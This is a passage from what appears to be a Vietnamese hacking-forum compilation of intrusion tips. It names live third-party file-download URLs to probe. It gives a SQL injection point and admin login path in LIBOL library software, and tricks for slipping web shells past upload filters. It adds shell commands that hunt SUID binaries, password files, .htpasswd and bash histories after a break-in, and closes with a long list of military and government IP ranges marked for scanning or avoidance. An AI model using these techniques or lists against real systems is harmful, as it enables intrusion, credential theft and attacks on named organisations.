khi là index.asp. Nhiều khi có 1 trong 2 trang này nhưng file lại chẳng
chứa thông tin gì nhạy cảm---> hãy thử file khác.

Một số link khác để nghịch 
http://www.aido-bz.it/dl.php?file=
http://www.jcdecaux.lt/dl.php?file=

ĐỌC THÊM !!!!

Libol là từ viết tắt Library online. Phần mềm được ứng dụng rộng rãi trên các thư viện lớn trong cả nước, tiêu biểu như thư viện Quốc hội Việt Nam, Trung tâm thông tin tư liệu và khoa học công nghệ Quốc gia, Thư viện khoa học tổng hợp TP HCM, ... và hầu hết các thư viện của các trường Đại học. Những thông tin liên quan đến Phần mềm Thư viện điện tử - Thư viện số LIBOL được giới thiệu cụ thể ...

chưa check các ver cao hơn... dừng lại ở v.5.0
---------Exploit----------------------------------------------------
http://[target]/libol50/search/detail.asp?aID=[SQL]
----------------------------------------------------------------------
Link admin :

http://[target]/admin/logon.asp

------------------------------------------------------------
Có thể tấn công trực tiếp qua form Admin logon

form login :

Tên:
Mật khẩu:

Code :

<FORM METHOD="POST" ACTION="logon.asp">
<TABLE CELLPADDING=3 CELLSPACING=1 BORDER=0>
<TR>
<TD ALIGN="right"><SMALL>Tên: </SMALL></TD>
<TD><INPUT TYPE="TEXT" NAME="User" SIZE=12></TD>
</TR>
<TR>
<TD ALIGN="right"><SMALL>Mật khẩu: </SMALL></TD>
<TD><INPUT TYPE="PASSWORD" NAME="Pass" SIZE=12></TD>
</TR>
<TR>
<TD COLSPAN=2>
<INPUT TYPE="Hidden" NAME="func" VALUE="Authen">
</TD>
</TR>
</TABLE>
<FONT FACE="Arial Unicode MS" SIZE=-1><INPUT TYPE="Submit" VALUE="Đăng nhập" STYLE="font-family:Arial Unicode MS"></FONT>
</FORM>

ĐỌC THÊM !!!!

Lâu lâu làm một vài bài giải trí .

1. Upload là cái gì chắc ai cũng biết nhỉ, nó là cho phép truyền tải file lên server qua một giao diện tương tác với người sử dụng.

2. Lợi hại gì qua cái upload ??
a. Lợi: tự nghiên cứu nha
b. Hại: cho lên con virus hay các loại file nguy hiểm lên thì sao nhỉ ...

3. Các chiêu khai thác chiến đấu với anh em web software cho phép upload nhé :

a. Không thấy cấm loại file nào, thế thì cho nguyên cái gì vào cũng được
b. Thử upload các loại file thông dụng: asp, aspx, php, php3, php5, cgi, pl, py, jsp.
c. Nếu nó cấm hết ở mục b thì ta thử các file pro hơn: exe, bat <--- đừng hỏi run cái loại này thế nào nhé . d. Nếu cho upload mỗi file image (bmp, gif, jpg, jpeg) thì sao ? + Thử thay đuôi cá xem : shell.php.jpg + Thử chơi NULL byte: shell.php.jpg + Thử mấy HEX byte chơi trội: shell.php%25%30%30.jpg + Thử mấy Unicode Byte shell.phpU+0025U+0030.jpg + Kiếm một file ảnh JPG, nhét nguyên code con shell vào trong comment của photo + Chèn code shell vào header của photo.

+ Trường hợp chuối: nó kiểm tra file type bằng cách soi ngay cái đuôi liền ví dụ: photo.jpg <-- được, nhưng photo.x.jpg <--- cái này không được ... tự hiểu cách xử lý củ chuối này nha + Cao cấp: upload qua SQL Injection , ví dụ với MySQL thì loadfile() <--- tuy nhiên chỉ cắn được nếu user là root@localhost; MSSQL hay Oracle thì chuối hơn ... + Cao cấp: upload bừa một file html lên xem có được hay không <--- hiểu ý chưa ^^! 4. Tìm vị trí file đã upload lên: + Up xong nó cho cái link file đã upload --> sướng
+ Dùng scanner để tìm các folder rồi lần mò vị trí file uploaded
+ Nhìn loanh quanh xem mấy vị trí nó để photo hay tài liệu gì đó xem link nó thế nào rồi kiểm tra thử
+ Phán đoán & suy luận & kinh nghiệm

Trên đây chỉ là những chiêu rất hay sử dụng và đơn giản để khai thác qua form upload. Tuy nhiên vẫn cần sự phán đoán tốt và suy luận logic thì mới có thể thực thụ qua cái này được.

Tất cả mọi thứ đều có cơ sở, có một cái gốc, bạn chỉ cần hiểu rõ và nắm chặt chẽ cái gốc thì việc xử lý các phần trên gốc không có gì khó khăn hết .

ĐỌC THÊM !!!!

find / -type f -perm -04000 -ls : tìm tất cả suid file
find / -type f -perm -02000 -ls : tìm tất cả sgid files
find / -type f -name : tìm config.inc.php
find / -type f -name \"config*\ : tìm file config
find / -perm -2 -ls"), tìm file,folders cho phép ghi
find / -type f -name service.pwd :find all service.pwd files
find / -type f -name .htpasswd :find all .htpasswd files
find / -type f -name .bash_history,: find all .bash_history files
---------------------------------------------------------
netstat -an | grep -i listen :show opened ports
netstat -an :show opened ports
------------------------------------------------
cat /etc/passwd :list user
cat / etc/userdomains :View cpanel user-domains logs
cat /var/cpanel/accounting.log: View cpanel logs
cat /usr/local/apache/conf/httpd.conf : Aache configuration
cat /etc/httpd.conf :Apache configuration
cat /etc/syslog.conf :Syslog configuration
cat /etc/motd :Message Of The Day

cat /etc/httpd/conf/httpd.conf|grep ServerName
cat /etc/httpd/conf/httpd.conf
cat /etc/localdomains
cat /etc/trueuserdomains

ls -lia [đường dẫn] : để view thư mục .
VD : ls -lia /usr/www/vhost/abc.com/public_html/forum

cat /etc/passwd : để đọc file passwd

Nếu server dùng cpanel thì :
cat /var/cpanel/accounting.log : để xem các domain trên server

ĐỌC THÊM !!!!

RANGE 6
6.* - Army Information Systems Center

RANGE 7
7.*.*.* Defense Information Systems Agency, VA

RANGE 11
11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC

RANGE 21
21. - US Defense Information Systems Agency

RANGE 22
22.* - Defense Information Systems Agency

RANGE 24
24.198.*.*

RANGE 25
25.*.*.* Royal Signals and Radar Establishment, UK

RANGE 26
26.* - Defense Information Systems Agency

RANGE 29
29.* - Defense Information Systems Agency

RANGE 30
30.* - Defense Information Systems Agency

RANGE 49
49.* - Joint Tactical Command

RANGE 50
50.* - Joint Tactical Command

RANGE 55
55.* - Army National Guard Bureau

RANGE 55
55.* - Army National Guard Bureau

RANGE 62
62.0.0.1 - 62.30.255.255 Do not scan!

RANGE 64
64.70.*.* Do not scan
64.224.* Do not Scan
64.225.* Do not scan
64.226.* Do not scan

RANGE 128
128.37.0.0 Army Yuma Proving Ground
128.38.0.0 Naval Surface Warfare Center
128.43.0.0 Defence Research Establishment-Ottawa
128.47.0.0 Army Communications Electronics Command
128.49.0.0 Naval Ocean Systems Center
128.50.0.0 Department of Defense
128.51.0.0 Department of Defense
128.56.0.0 U.S. Naval Academy
128.60.0.0 Naval Research Laboratory
128.63.0.0 Army Ballistics Research Laboratory
128.80.0.0 Army Communications Electronics Command
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency
128.102.0.0 NASA Ames Research Center
128.149.0.0 NASA Headquarters
128.154.0.0 NASA Wallops Flight Facility
128.155.0.0 NASA Langley Research Center
128.156.0.0 NASA Lewis Network Control Center
128.157.0.0 NASA Johnson Space Center
128.158.0.0 NASA Ames Research Center
128.159.0.0 NASA Ames Research Center
128.160.0.0 Naval Research Laboratory
128.161.0.0 NASA Ames Research Center
128.183.0.0 NASA Goddard Space Flight Center
128.190.0.0 Army Belvoir Reasearch and Development Center
128.202.0.0 50th Space Wing
128.216.0.0 MacDill Air Force Base
128.217.0.0 NASA Kennedy Space Center
128.236.0.0 U.S. Air Force Academy

RANGE 129
129.23.0.0 Strategic Defense Initiative Organization
129.29.0.0 United States Military Academy
129.50.0.0 NASA Marshall Space Flight Center
129.51.0.0 Patrick Air Force Base
129.52.0.0 Wright-Patterson Air Force Base
129.53.0.0 - 129.53.255.255 66SPTG-SCB
129.54.0.0 Vandenberg Air Force Base, CA
129.92.0.0 Air Force Institute of Technology
129.99.0.0 NASA Ames Research Center
129.131.0.0 Naval Weapons Center
129.139.0.0 Army Armament Research Development and Engineering Center
129.141.0.0 85 MISSION SUPPORT SQUADRON/SCSN
129.163.0.0 NASA/Johnson Space Center
129.164.0.0 NASA IVV
129.165.0.0 NASA Goddard Space Flight Center
129.166.0.0 NASA - John F. Kennedy Space Center
129.167.0.0 NASA Marshall Space Flight Center
129.168.0.0 NASA Lewis Research Center
129.190.0.0 Naval Underwater Systems Center
129.198.0.0 Air Force Flight Test Center
129.209.0.0 Army Ballistics Research Laboratory
129.229.0.0 U.S. Army Corps of Engineers
129.251.0.0 United States Air Force Academy

RANGE 130
130.40.0.0 NASA Johnson Space Center
130.90.0.0 Mather Air Force Base
130.109.0.0 Naval Coastal Systems Center
130.114.0.0 Army Aberdeen Proving Ground Installation Support Activity
130.124.0.0 Honeywell Defense Systems Group
130.165.0.0 U.S.Army Corps of Engineers
130.167.0.0 NASA Headquarters

RANGE 131
131.3.0.0 - 131.3.255.255 Mather Air Force Base
131.6.0.0 Langley Air Force Base
131.10.0.0 Barksdale Air Force Base
131.17.0.0 Sheppard Air Force Base
131.21.0.0 Hahn Air Base
131.22.0.0 Keesler Air Force Base
131.24.0.0 6 Communications Squadron
131.25.0.0 Patrick Air Force Base
131.27.0.0 75 ABW
131.30.0.0 62 CS/SCSNT
131.32.0.0 37 Communications Squadron
131.35.0.0 Fairchild Air Force Base
131.36.0.0 Yokota Air Base
131.37.0.0 Elmendorf Air Force Base
131.38.0.0 Hickam Air Force Base
131.39.0.0 354CS/SCSN
131.40.0.0 Bergstrom Air Force Base
131.44.0.0 Randolph Air Force Base
131.46.0.0 20 Communications Squadron
131.47.0.0 Andersen Air Force Base
131.50.0.0 Davis-Monthan Air Force Base
131.52.0.0 56 Communications Squadron /SCBB
131.54.0.0 Air Force Concentrator Network
131.56.0.0 Upper Heyford Air Force Base
131.58.0.0 Alconbury Royal Air Force Base
131.59.0.0 7 Communications Squadron
131.61.0.0 McConnell Air Force Base
131.62.0.0 Norton Air Force Base
131.71.0.0 - 131.71.255.255 NAVAL AVIATION DEPOT CHERRY PO
131.74.0.0 Defense MegaCenter Columbus
131.84.0.0 Defense Technical Information Center
131.92.0.0 Army Information Systems Command - Aberdeen (EA)
131.105.0.0 McClellan Air Force Base
131.110.0.0 NASA/Michoud Assembly Facility
131.120.0.0 Naval Postgraduate School
131.121.0.0 United States Naval Academy
131.122.0.0 United States Naval Academy
131.176.0.0 European Space Operations Center
131.182.0.0 NASA Headquarters
131.250.0.0 Office of the Chief of Naval Research

RANGE 132
132.3.0.0 Williams Air Force Base
132.5.0.0 - 132.5.255.255 49th Fighter Wing
132.6.0.0 Ankara Air Station
132.7.0.0 - 132.7.255.255 SSG/SINO
132.9.0.0 28th Bomb Wing
132.10.0.0 319 Comm Sq
132.11.0.0 Hellenikon Air Base
132.12.0.0 Myrtle Beach Air Force Base
132.13.0.0 Bentwaters Royal Air Force Base
132.14.0.0 Air Force Concentrator Network
132.15.0.0 Kadena Air Base
132.16.0.0 Kunsan Air Base
132.17.0.0 Lindsey Air Station
132.18.0.0 McGuire Air Force Base
132.19.0.0 100CS (NET-MILDENHALL)
132.20.0.0 35th Communications Squadron
132.21.0.0 Plattsburgh Air Force Base
132.22.0.0 23Communications Sq
132.24.0.0 Dover Air Force Base
132.25.0.0 786 CS/SCBM
132.27.0.0 - 132.27.255.255 39CS/SCBBN
132.28.0.0 14TH COMMUNICATION SQUADRON
132.30.0.0 Lajes Air Force Base
132.31.0.0 Loring Air Force Base
132.33.0.0 60CS/SCSNM
132.34.0.0 Cannon Air Force Base
132.35.0.0 Altus Air Force Base
132.37.0.0 75 ABW
132.38.0.0 Goodfellow AFB
132.39.0.0 K.I. Sawyer Air Force Base
132.40.0.0 347 COMMUNICATION SQUADRON
132.42.0.0 Spangdahlem Air Force Base
132.43.0.0 Zweibruchen Air Force Base
132.45.0.0 Chanute Air Force Base
132.46.0.0 Columbus Air Force Base
132.48.0.0 Laughlin Air Force Base
132.49.0.0 366CS/SCSN
132.50.0.0 Reese Air Force Base
132.52.0.0 Vance Air Force Base
132.54.0.0 Langley AFB
132.55.0.0 Torrejon Air Force Base
132.56.0.0 - 132.56.255.255 9 CS/SC
132.57.0.0 Castle Air Force Base
132.58.0.0 Nellis Air Force Base
132.59.0.0 24Comm Squadron\SCSNA
132.60.0.0 - 132.60.255.255 42ND COMMUNICATION SQUADRON
132.61.0.0 SSG/SIN
132.62.0.0 - 132.62.255.255 377 COMMUNICATION SQUADRON
132.79.0.0 Army National Guard Bureau
132.80.0.0 - 132.80.255.255 NGB-AIS-OS
132.80.0.0 - 132.85.255.255 National Guard Bureau
132.82.0.0 Army National Guard Bureau
132.86.0.0 National Guard Bureau
132.87.0.0 - 132.93.255.255 National Guard Bureau
132.94.0.0 Army National Guard Bureau
132.95.0.0 - 132.103.255.255 National Guard Bureau
132.95.0.0 - 132.108.0.0 DOD Network Information Center
132.104.0.0 - 132.104.255.255 Army National Guard Bureau
132.105.0.0 - 132.108.255.255 Army National Guard Bureau
132.109.0.0 National Guard Bureau
132.110.0.0 - 132.116.255.255 Army National Guard Bureau
132.114.0.0 Army National Guard
132.117.0.0 Army National Guard Bureau
132.118.0.0 - 132.132.0.0 Army National Guard Bureau
132.122.0.0 South Carolina Army National Guard, USPFO
132.133.0.0 National Guard Bureau
132.134.0.0 - 132.143.255.255 National Guard Bureau
132.159.0.0 Army Information Systems Command
132.193.0.0 Army Research Office
132.250.0.0 Naval Research Laboratory

RANGE 134
134.5.0.0 Lockheed Aeronautical Systems Company
134.11.0.0 The Pentagon
134.12.0.0 NASA Ames Research Center
134.51.0.0 Boeing Military Aircraft Facility
134.52.*.* Boeing Corporation
134.78.0.0 Army Information Systems Command-ATCOM
134.80.0.0 Army Information Systems Command
134.118.0.0 NASA/Johnson Space Center
134.131.0.0 Wright-Patterson Air Force Base
134.136.0.0 Wright-Patterson Air Force Base
134.164.0.0 Army Engineer Waterways Experiment Station
134.165.0.0 Headquarters Air Force Space Command
134.194.0.0 U.S. Army Aberdeen Test Center
134.205.0.0 7th Communications Group
134.207.0.0 Naval Research Laboratory
134.229.0.0 Navy Regional Data Automation Center
134.230.0.0 Navy Regional Data Automation Center
134.232.0.0 - 134.232.255.255 U.S. Army, Europe
134.233.0.0 HQ 5th Signal Command
134.234.0.0 - 134.234.255.255 Southern European Task Force
134.235.0.0 HQ 5th Signal Command
134.240.0.0 U.S. Military Academy
136.149.0.0 Air Force Military Personnel Center

RANGE 136
136.178.0.0 NASA Research Network
136.188.0.0 - 136.197.255.255 Defense Intelligence Agency
136.207.0.0 69th Signal Battalion
136.208.0.0 HQ, 5th Signal Command
136.209.0.0 HQ 5th Signal Command
136.210.0.0 HQ 5th Signal Command
136.212.0.0 HQ 5th Signal Command
136.213.0.0 HQ, 5th Signal Command
136.214.0.0 HQ, 5th Signal Command
136.215.0.0 HQ, 5th Signal Command
136.216.0.0 HQ, 5th Signal Command
136.217.0.0 HQ, 5th Signal Command
136.218.0.0 HQ, 5th Signal Command
136.219.0.0 HQ, 5th Signal Command
136.220.0.0 HQ, 5th Signal Command
136.221.0.0 HQ, 5th Signal Command
136.222.0.0 HQ, 5th Signal Command

RANGE 137
137.1.0.0 Whiteman Air Force Base
137.2.0.0 George Air Force Base
137.3.0.0 Little Rock Air Force Base
137.4.0.0 - 137.4.255.255 437 CS/SC
137.5.0.0 Air Force Concentrator Network
137.6.0.0 Air Force Concentrator Network
137.11.0.0 HQ AFSPC/SCNNC
137.12.0.0 Air Force Concentrator Network
137.17.* National Aerospace Laboratory
137.24.0.0 Naval Surface Warfare Center
137.29.0.0 First Special Operations Command
137.67.0.0 Naval Warfare Assessment Center
137.94.* Royal Military College
137.95.* Headquarters, U.S. European Command
137.126.0.0 USAF MARS
137.127.* Army Concepts Analysis Agency
137.128.* U.S. ARMY Tank-Automotive Command
137.130.0.0 Defense Information Systems Agency
137.209.0.0 Defense Information Systems Agency
137.210.0.0 Defense Information Systems Agency
137.211.0.0 Defense Information Systems Agency
137.212.0.0 Defense Information Systems Agency
137.231.0.0 HQ 5th Signal Command
137.232.0.0 Defense Information Systems Agency
137.233.0.0 Defense Information Systems Agency
137.234.0.0 Defense Information Systems Agency
137.235.0.0 Defense Information Systems Agency
137.240.0.0 Air Force Materiel Command
137.241.0.0 75 ABW
137.242.0.0 Air Force Logistics Command
137.243.0.0 77 CS/SCCN
137.244.0.0 78 CS/SCSC
137.245.0.0 Wright Patterson Air Force Base
137.246.0.0 United States Atlantic Command Joint Training

RANGE 138
138.13.0.0 Air Force Systems Command
138.27.0.0 Army Information Systems Command
138.50.0.0 HQ 5th Signal Command
138.65.0.0 HQ, 5th Signal Command
138.76.0.0 NASA Headquarters
138.109.0.0 Naval Surface Warfare Center
138.115.0.0 NASA Information and Electronic Systems Laboratory
138.135.0.0 - 138.135.255.255 DEFENSE PROCESSING CENTERPERAL HARBOR
138.136.0.0 - 138.136.255.255 Navy Computers and Telecommunications Station
138.137.0.0 Navy Regional Data Automation Center (NARDAC)
138.139.0.0 Marine Corps Air Station
138.140.0.0 Navy Regional Data Automation Center
138.141.0.0 Navy Regional Data Automation Center
138.142.0.0 Navy Regional Data Automation Center
138.143.0.0 Navy Regional Data Automation Center
138.144.0.0 NAVCOMTELCOM
138.145.0.0 NCTS WASHINGTON
138.146.0.0 NCTC
138.147.0.0 NCTC
138.148.0.0 NCTC
138.149.0.0 NCTC
138.150.0.0 NCTC
138.151.0.0 NCTC
138.152.0.0 NCTC
138.153.0.0 Yokosuka Naval Base
138.154.0.0 NCTC
138.155.0.0 NCTC
138.156.0.0 Marine Corps Central Design & Prog. Activity
138.157.0.0 - 138.157.255.255 Marine Corps Central Design & Prog. Activity
138.158.0.0 Marine Corps Central Design & Prog. Activity
138.159.0.0 NCTC
138.160.0.0 Naval Air Station
138.161.0.0 NCTC
138.162.0.0 NCTC
138.163.0.0 NCTC
138.164.0.0 NCTC
138.165.0.0 NCTC
138.166.0.0 NCTC
138.167.0.0 NOC, MCTSSA, East
138.168.0.0 Marine Corps Central Design & Prog. Activity
138.169.0.0 NAVAL COMPUTER AND TELECOMM
138.169.12.0 NAVAL COMPUTER AND TELECOMM
138.169.13.0 NAVAL COMPUTER AND TELECOMM
138.170.0.0 NCTC
138.171.0.0 NCTC
138.172.0.0 NCTC
138.173.0.0 NCTC
138.174.0.0 NCTC
138.175.0.0 NCTC
138.176.0.0 NCTC
138.177.0.0 NCTS Pensacola
138.178.0.0 NCTC
138.179.0.0 NCTC
138.180.0.0 NCTC
138.181.0.0 NCTC
138.182.0.0 CNO N60
138.183.0.0 NCTC
138.184.0.0 NCTS
138.193.0.0 NASA/Yellow Creek

RANGE 139
139.31.0.0 20th Tactical Fighter Wing
139.32.0.0 48th Tactical Fighter Wing
139.33.0.0 36th Tactical Fighter Wing
139.34.0.0 52nd Tactical Fighter Wing
139.35.0.0 50th Tactical Fighter Wing
139.36.0.0 66th Electronic Combat Wing
139.37.0.0 26th Tactical Reconnaissance Wing
139.38.0.0 32nd Tactical Fighter Squadron
139.39.0.0 81st Tactical Fighter Wing
139.40.0.0 10th Tactical Fighter Wing
139.41.0.0 39th Tactical Air Control Group
139.42.0.0 40th Tactical Air Control Group
139.43.0.0 401st Tactical Fighter Wing
139.124.* Reseau Infomratique
139.142.*.*

RANGE 140
140.1.0.0 Defense Information Systems Agency
140.3.0.0 Defense Information Systems Agency
140.4.0.0 Defense Information Systems Agency
140.5.0.0 Defense Information Systems Agency
140.6.0.0 Defense Information Systems Agency
140.7.0.0 Defense Information Systems Agency
140.8.0.0 Defense Information Systems Agency
140.9.0.0 Defense Information Systems Agency
140.10.0.0 Defense Information Systems Agency
140.11.0.0 Defense Information Systems Agency
140.12.0.0 Defense Information Systems Agency
140.13.0.0 Defense Information Systems Agency
140.14.0.0 DISA Columbus Level II NOC
140.15.0.0 Defense Information Systems Agency
140.16.0.0 Defense Information Systems Agency
140.17.0.0 Defense Information Systems Agency
140.18.0.0 Defense Information Systems Agency
140.19.0.0 Defense Information Systems Agency
140.20.0.0 Defense Information Systems Agency
140.21.0.0 Defense Information Systems Agency
140.22.0.0 Defense Information Systems Agency
140.23.0.0 Defense Information Systems Agency
140.24.0.0 ASIC ALLIANCE-MARLBORO
140.25.0.0 Defense Information Systems Agency
140.26.0.0 Defense Information Systems Agency
140.27.0.0 Defense Information Systems Agency
140.28.0.0 Defense Information Systems Agency
140.29.0.0 Defense Information Systems Agency
140.30.0.0 Defense Information Systems Agency
140.31.0.0 Defense Information Systems Agency
140.32.0.0 Defense Information Systems Agency
140.33.0.0 Defense Information Systems Agency
140.34.0.0 Defense Information Systems Agency
140.35.0.0 Defense Information Systems Agency
140.36.0.0 Defense Information Systems Agency
140.37.0.0 Defense Information Systems Agency
140.38.0.0 Defense Information Systems Agency
140.39.0.0 Defense Information Systems Agency
140.40.0.0 Defense Information Systems Agency
140.41.0.0 Defense Information Systems Agency
140.42.0.0 Defense Information Systems Agency
140.43.0.0 Defense Information Systems Agency
140.44.0.0 Defense Information Systems Agency
140.45.0.0 Defense Information Systems Agency
140.46.0.0 Defense Information Systems Agency
140.47.0.0 - 140.47.255.255 Defense Information Systems Agency
140.47.0.0 - 140.48.255.255 DOD Network Information Center
140.48.0.0 - 140.48.255.255 Defense Information Systems Agency
140.49.0.0 Defense Information Systems Agency
140.50.0.0 Defense Information Systems Agency
140.51.0.0 Defense Information Systems Agency
140.52.0.0 Defense Information Systems Agency
140.53.0.0 Defense Information Systems Agency
140.54.0.0 Defense Information Systems Agency
140.55.0.0 Defense Information Systems Agency
140.56.0.0 Defense Information Systems Agency
140.57.0.0 Defense Information Systems Agency
140.58.0.0 Defense Information Systems Agency
140.59.0.0 Defense Information Systems Agency
140.60.0.0 Defense Information Systems Agency
140.61.0.0 Defense Information Systems Agency
140.62.0.0 Defense Information Systems Agency
140.63.0.0 Defense Information Systems Agency
140.64.0.0 Defense Information Systems Agency
140.65.0.0 Defense Information Systems Agency
140.66.0.0 Defense Information Systems Agency
140.67.0.0 Defense Information Systems Agency
140.68.0.0 Defense Information Systems Agency
140.69.0.0 Defense Information Systems Agency
140.70.0.0 Defense Information Systems Agency
140.71.0.0 Defense Information Systems Agency
140.72.0.0 Defense Information Systems Agency
140.73.0.0 Defense Information Systems Agency
140.74.0.0 - 140.74.255.255 Defense Information Systems Agency
140.100.0.0 Naval Sea Systems Command
140.139.0.0 HQ US Army Medical Research and Development Command
140.154.0.0 HQ 5th Signal Command
140.155.0.0 HQ, 5th Signal Command
140.156.0.0 HQ, 5th Signal Command
140.175.0.0 Scott Air Force Base
140.178.0.0 Naval Undersea Warfare Center Division, Keyport
140.187.0.0 Fort Bragg
140.194.0.0 US Army Corps of Engineers
140.195.0.0 Naval Sea Systems Command
140.199.0.0 Naval Ocean Systems Center
140.201.0.0 HQ, 5th Signal Command
140.202.0.0 106TH SIGNAL BRIGADE

RANGE 143
143.45.0.0 58th Signal Battalion
143.46.0.0 U.S. Army, 1141st Signal Battalion
143.68.0.0 Headquarters, USAISC
143.69.0.0 Headquarters, USAAISC
143.70.0.0 Headquarters, USAAISC
143.71.0.0 Headquarters, USAAISC
143.72.0.0 Headquarters, USAAISC
143.73.0.0 Headquarters, USAAISC
143.74.0.0 Headquarters, USAAISC
143.75.0.0 Headquarters, USAAISC
143.76.0.0 Headquarters, USAAISC
143.77.0.0 Headquarters, USAAISC
143.78.0.0 Headquarters, USAAISC
143.79.0.0 Headquarters, USAAISC
143.80.0.0 Headquarters, USAAISC
143.81.0.0 Headquarters, USAAISC
143.82.0.0 Headquarters, USAAISC
143.84.0.0 Headquarters, USAAISC
143.85.0.0 Headquarters, USAAISC
143.86.0.0 Headquarters, USAAISC
143.87.0.0 Headquarters, USAAISC
143.232.0.0 NASA Ames Research Center

RANGE 144
144.99.0.0 United States Army Information Systems Command
144.109.0.0 Army Information Systems Command
144.143.0.0 Headquarters, Third United States Army
144.144.0.0 Headquarters, Third United States Army
144.146.0.0 Commander, Army Information Systems Center
144.147.0.0 Commander, Army Information Systems Center
144.170.0.0 HQ, 5th Signal Command
144.192.0.0 United States Army Information Services Command-Campbell
144.233.0.0 Defense Intelligence Agency
144.234.0.0 Defense Intelligence Agency
144.235.0.0 Defense Intelligence Agency
144.236.0.0 Defense Intelligence Agency
144.237.0.0 Defense Intelligence Agency
144.238.0.0 Defense Intelligence Agency
144.239.0.0 Defense Intelligence Agency
144.240.0.0 Defense Intelligence Agency
144.241.0.0 Defense Intelligence Agency
144.242.0.0 Defense Intelligence Agency
144.252.0.0 U.S. Army LABCOM

RANGE 146
146.17.0.0 HQ, 5th Signal Command
146.80.0.0 Defence Research Agency
146.98.0.0 HQ United States European Command
146.154.0.0 NASA/Johnson Space Center
146.165.0.0 NASA Langley Research Center

RANGE 147
147.35.0.0 HQ, 5th Signal Command
147.36.0.0 HQ, 5th Signal Command
147.37.0.0 HQ, 5th Signal Command
147.38.0.0 HQ, 5th Signal Command
147.39.0.0 HQ, 5th Signal Command
147.40.0.0 HQ, 5th Signal Command
147.42.0.0 Army CALS Project
147.103.0.0 Army Information Systems Software Center
147.104.0.0 Army Information Systems Software Center
147.159.0.0 Naval Air Warfare Center, Aircraft Division
147.168.0.0 Naval Surface Warfare Center
147.169.0.0 HQ, 5th Signal Command
147.198.0.0 Army Information Systems Command
147.199.0.0 Army Information Systems Command
147.238.0.0 Army Information Systems Command
147.239.0.0 1112th Signal Battalion
147.240.0.0 US Army Tank-Automotive Command
147.242.0.0 19th Support Command
147.248.0.0 Fort Monroe DOIM
147.254.0.0 7th Communications Group

RANGE 148
148.114.0.0 NASA, Stennis Space Center

RANGE 150
150.113.0.0 1114th Signal Battalion
150.114.0.0 1114th Signal Battalion
150.125.0.0 Space and Naval Warfare Command
150.133.0.0 10th Area Support Group
150.144.0.0 NASA Goodard Space Flight Center
150.149.0.0 Army Information Systems Command
150.157.0.0 USAISC-Fort Lee
150.184.0.0 Fort Monroe DOIM
150.190.0.0 USAISC-Letterkenny
150.196.0.0 USAISC-LABCOM

RANGE 152
152.82.0.0 7th Communications Group of the Air Force
152.151.0.0 U.S. Naval Space & Naval Warfare Systems Command
152.152.0.0 NATO Headquarters
152.154.0.0 Defense Information Systems Agency
152.229.0.0 Defense MegaCenter (DMC) Denver

RANGE 153
153.21.0.0 USCENTAF/SCM
153.22.0.0 USCENTAF/SCM
153.23.0.0 USCENTAF/SCM
153.24.0.0 USCENTAF/SCM
153.25.0.0 USCENTAF/SCM
153.26.0.0 USCENTAF/SCM
153.27.0.0 USCENTAF/SCM
153.28.0.0 USCENTAF/SCM
153.29.0.0 USCENTAF/SCM
153.30.0.0 USCENTAF/SCM
153.31.0.0 Federal Bureau of Investigation

RANGE 155
155.5.0.0 1141st Signal Bn
155.6.0.0 1141st Signal Bn
155.7.0.0 American Forces Information
155.8.0.0 U.S. ArmyFort Gordon
155.9.0.0 - 155.9.255.255 United States Army Information Systems Command
155.74.0.0 PEO STAMIS
155.75.0.0 US Army Corps of Engineers
155.76.0.0 PEO STAMIS
155.77.0.0 PEO STAMIS
155.78.0.0 PEO STAMIS
155.79.0.0 US Army Corps of Engineers
155.80.0.0 PEO STAMIS
155.81.0.0 PEO STAMIS
155.82.0.0 PEO STAMIS
155.83.0.0 US Army Corps of Enginers
155.84.0.0 PEO STAMIS
155.85.0.0 PEO STAMIS
155.86.0.0 US Army Corps of Engineers
155.87.0.0 PEO STAMIS
155.88.0.0 PEO STAMIS
155.96.0.0 Drug Enforcement Administration
155.149.0.0 1112th Signal Battalion
155.155.0.0 HQ, 5th Signal Command
155.178.0.0 Federal Aviation Administration
155.213.0.0 USAISC Fort Benning
155.214.0.0 Director of Information Management
155.215.0.0 USAISC-FT DRUM
155.216.0.0 TCACCIS Project Management Office
155.217.0.0 Directorate of Information Management
155.218.0.0 USAISC
155.219.0.0 DOIM/USAISC Fort Sill
155.220.0.0 USAISC-DOIM
155.221.0.0 USAISC-Ft Ord

RANGE 156
156.9.0.0 U. S. Marshals Service

RANGE 157
157.150.0.0 United Nations
157.153.0.0 COMMANDER NAVAL SURFACE U.S. PACIFIC FLEET
157.202.0.0 US Special Operations Command
157.217.0.0 U. S. Strategic Command

RANGE 158
158.1.0.0 Commander, Tooele Army Depot
158.2.0.0 USAMC Logistics Support Activity
158.3.0.0 U.S. Army TACOM
158.4.0.0 UASISC Ft. Carson
158.5.0.0 1112th Signal Battalion
158.6.0.0 USAISC-Ft. McCoy
158.7.0.0 USAISC-FLW
158.8.0.0 US Army Soldier Support Center
158.9.0.0 USAISC-CECOM
158.10.0.0 GOC
158.11.0.0 UASISC-Vint Hill
158.12.0.0 US Army Harry Diamond Laboratories
158.13.0.0 USAISC DOIM
158.14.0.0 1112th Signal Battalion
158.15.0.0 - 158.15.255.255 Defense Megacenter Huntsville
158.16.0.0 Rocky Mountain Arsenal (PMRMA)
158.17.0.0 Crane Army Ammunition Activity
158.18.0.0 Defense Finance & Accounting Service Center
158.19.0.0 DOIM
158.20.0.0 DOIM
158.235.0.0 Marine Corps Central Design and Programming Activity
158.243.0.0 Marine Corps Central Design and Programming Activity
158.244.0.0 Marine Corps Central Design and Programming Activity
158.245.0.0 Marine Corps Central Design and Programming Activity
158.246.0.0 Marine Corps Central Design and Programming Activity

RANGE 159
159.120.0.0 Naval Air Systems Command (Air 4114)

RANGE 160
160.132.0.0 US Army Recruiting Command
160.135.0.0 36th Signal BN
160.138.0.0 USAISC
160.139.0.0 USAISC
160.140.0.0 HQ, United States Army
160.143.0.0 USAISC
160.145.0.0 1101st Signal Brigade
160.146.0.0 USAISC SATCOMSTA-CAMP ROBERTS
160.150.0.0 Commander, Moncrief Army Hospital

RANGE 161
161.124.0.0 NAVAL WEAPONS STATION

RANGE 162
162.32.0.0 Naval Aviation Depot Pensacola
162.45.0.0 Central Intelligence Agency
162.46.0.0 Central Intelligence Agency

RANGE 163
163.205.0.0 NASA Kennedy Space Center
163.206.0.0 NASA Kennedy Space Center

RANGE 164
164.45.0.0 Naval Ordnance Center, Pacific Division
164.49.0.0 United States Army Space and Strategic Defense
164.65.*.* DMSSC/TSD (MIL)
164.66.*.* Anniston Army Depot
164.87.*.* Army Depot
